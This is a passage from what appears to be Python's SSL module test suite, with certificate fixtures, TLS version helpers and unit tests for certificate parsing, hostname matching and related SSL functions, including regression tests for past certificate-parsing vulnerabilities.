("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
        # Assume that any reference to "ubuntu" implies an Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
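# Helper mirroring the legacy wrap_socket() signature on top of SSLContext:
# it builds a client or server context from the keyword arguments and wraps
# the given socket with it.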
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
        # an unconnected socket should return None for a known binding type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
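        # Dropping the last reference to an unclosed SSL socket should emit a
        # ResourceWarning whose message mentions the socket's repr.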
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
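        # get_default_verify_paths() returns a 6-field DefaultVerifyPaths tuple
        # whose cafile/capath honor SSL_CERT_FILE and SSL_CERT_DIR.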
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (frozenset, set, bool))
if isinstance(trust, (frozenset, set)):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
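        # _ASN1Object can be built from an OID string and looked up by NID or
        # by short/long name; every route should yield the same
        # (nid, shortname, longname, oid) tuple.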
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
